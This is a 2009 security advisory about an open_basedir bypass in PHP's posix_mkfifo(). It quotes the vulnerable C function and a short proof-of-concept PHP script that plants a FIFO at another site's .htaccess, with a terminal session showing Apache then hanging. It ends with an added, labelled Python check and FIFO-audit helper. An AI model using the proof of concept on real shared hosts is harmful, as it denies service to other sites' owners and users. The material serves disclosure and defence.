[ PHP 5.2.11/5.3.0 (posix.c) open_basedir bypass ]

Author: Grzegorz Stachowiak

Date:
- Dis.: 25.09.2009
- Pub.: 29.09.2009

Risk: Low

Affected Software:
- PHP 5.3.0
- PHP 5.2.11 and prior

--- 0. Description ---
PHP is an HTML-embedded scripting language. Much of its syntax is borrowed
from C, Java and Perl with a couple of unique PHP-specific features thrown
in. The goal of the language is to allow web developers to write
dynamically generated pages quickly.

http://lu2.php.net/manual/en/function.posix-mkfifo.php

--- 1. PHP 5.2.11/5.3.0 (posix.c) open_basedir bypass ---

posix_mkfifo — Create a fifo special file (a named pipe)

posix_mkfifo() creates a special FIFO file which exists in the file system and acts as a bidirectional communication endpoint for processes.

The function does not check the open_basedir setting, so a FIFO special file can be created in any writable directory even when open_basedir is enabled. This can be used to "freeze" Apache and prevent access to any writable directory.

---ext/posix/posix.c---

PHP_FUNCTION(posix_mkfifo)
{
	char *path;
	int path_len;
	long mode;
	int     result;
	
	if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "sl", &path, &path_len, &mode) == FAILURE) {
		RETURN_FALSE;
	}

	if (PG(safe_mode) && (!php_checkuid(path, NULL, CHECKUID_ALLOW_ONLY_DIR))) {                        [1]
		RETURN_FALSE;
	}

	result = mkfifo(path, mode);
	if (result < 0) {
		POSIX_G(last_error) = errno;
		RETURN_FALSE;
	}

	RETURN_TRUE;
}

---ext/standard/file.c---

[1] posix_mkfifo() checks only the safe_mode setting (through php_checkuid()); no open_basedir check is performed before mkfifo() is called.


---example0 (5.2.11/5.3.0)---

x@x-desktop:/var/www/$ php -v

PHP 5.3.0 (cli) (built: Sep 22 2009 14:06:39)
Copyright (c) 1997-2009 The PHP Group
Zend Engine v2.3.0, Copyright (c) 1998-2009 Zend Technologies

|----------------------------------------------------------------|

x@x-desktop:/var/www$ php -r "echo ini_get('open_basedir').PHP_EOL;"

/var/www:/tmp

x@x-desktop:/var/www$


|----------------------------------------------------------------|

x@x-desktop:/var/www$ cat fifo.php

<?php
// Path lies outside open_basedir (/var/www:/tmp), yet the call succeeds.
posix_mkfifo('/home/y/www/.htaccess', 0777);
?>
|----------------------------------------------------------------|

x@x-desktop:/var/www$ wget http://localhost/config.txt
--17:39:31-- http://localhost:80/config.txt
=> `config.txt'
Connecting to localhost:80... connected!
HTTP request sent, awaiting response... 200 OK
Length: 25 [text/plain]

0K -> [100%]

(24.41 KB/s) - `config.txt' saved [25/25] 

|----------------------------------------------------------------|

x@x-desktop:/var/www$ php fifo.php

x@x-desktop:/var/www$

|----------------------------------------------------------------|

x@x-desktop:/var/www$ wget http://localhost/config.txt
--17:39:43-- http://localhost:80/config.txt
=> `config.txt'
Connecting to localhost:80... connected!
HTTP request sent, awaiting response...

|----------------------------------------------------------------|

Apache tries to read the .htaccess file, but a FIFO special file does not allow a "normal" read: the open blocks until a writer appears, so no file in that directory or any of its subdirectories can be served.
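Two things a defender wants from this advisory are the check that [1] omits and a way to find FIFO special files that may already sit in a document root. The Python below is an added example, not PHP's source and not the advisory author's code. path_allowed() is a simplified model of PHP's open_basedir test (resolve symlinks and "..", then require the target's parent directory to be an allowed directory or one below it, with each entry treated as a directory rather than a bare prefix); the directory names, the open_basedir value and the planted FIFO are constructed in a temporary directory and stand in for /var/www and /home/y/www from the session above.

```python
"""Added example (not PHP's code): a userland model of the open_basedir check that
posix_mkfifo() omitted, plus an audit walk that reports FIFO special files under a
web root. All paths used by demo() are constructed in a temporary directory."""
import os
import stat
import tempfile
from typing import Dict, List


def parse_open_basedir(value: str) -> List[str]:
    """Split a PHP open_basedir value; PHP separates entries with ':' on Unix."""
    return [entry for entry in value.split(":") if entry]


def path_allowed(path: str, basedirs: List[str]) -> bool:
    """Simplified model (assumption, not PHP's exact code) of the per-entry check:
    resolve symlinks and '..', then require the target's parent directory to be the
    basedir itself or a directory below it. The target need not exist yet, which is
    the mkfifo situation, so only the parent directory is judged."""
    resolved = os.path.realpath(path)       # tolerates a non-existent final component
    parent = os.path.dirname(resolved)
    for base in basedirs:
        base_real = os.path.realpath(base).rstrip(os.sep)   # "" when base is "/"
        if parent == (base_real or os.sep) or parent.startswith(base_real + os.sep):
            return True
    return False


def guarded_mkfifo(path: str, mode: int, open_basedir: str) -> bool:
    """Create the FIFO only when open_basedir (empty string = unrestricted) permits
    the path. Returns False instead of raising, mirroring posix_mkfifo()'s RETURN_FALSE."""
    if open_basedir and not path_allowed(path, parse_open_basedir(open_basedir)):
        return False
    try:
        os.mkfifo(path, mode)
    except OSError:
        return False
    return True


def find_fifos(root: str) -> List[str]:
    """Audit helper: list FIFO special files under a directory tree, relative to root.
    lstat is used so symlinks are reported by their own type and never followed."""
    hits = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            full = os.path.join(dirpath, name)
            if stat.S_ISFIFO(os.lstat(full).st_mode):
                hits.append(os.path.relpath(full, root))
    return sorted(hits)


def demo() -> Dict[str, object]:
    """Constructed scenario: a document root and an unrelated vhost directory inside
    a temp dir, with open_basedir limited to the document root."""
    with tempfile.TemporaryDirectory() as tmp:
        docroot = os.path.join(tmp, "var_www")        # stands in for /var/www
        other_vhost = os.path.join(tmp, "home_y_www")  # stands in for /home/y/www
        os.makedirs(docroot)
        os.makedirs(other_vhost)
        basedir_value = docroot

        inside = guarded_mkfifo(os.path.join(docroot, "pipe"), 0o600, basedir_value)
        outside = guarded_mkfifo(os.path.join(other_vhost, ".htaccess"), 0o777, basedir_value)
        # A lexical prefix of the basedir name that is not inside it must be refused too.
        sibling = guarded_mkfifo(os.path.join(tmp, "var_www2", "x"), 0o600, basedir_value)

        # Plant a FIFO out of band, as the unguarded function would, and audit that tree.
        os.mkfifo(os.path.join(other_vhost, ".htaccess"))
        return {
            "inside_allowed": inside,
            "outside_allowed": outside,
            "sibling_prefix_allowed": sibling,
            "fifos_found": find_fifos(other_vhost),
        }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

find_fifos() is the piece to run periodically over every document root on a shared host; a FIFO named .htaccess (or any other file Apache opens on every request) is the symptom described above, and removing it restores service.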

--- 3. Contact ---

Author: Grzegorz Stachowiak
Email: stachowiak {a|t} analogicode.pl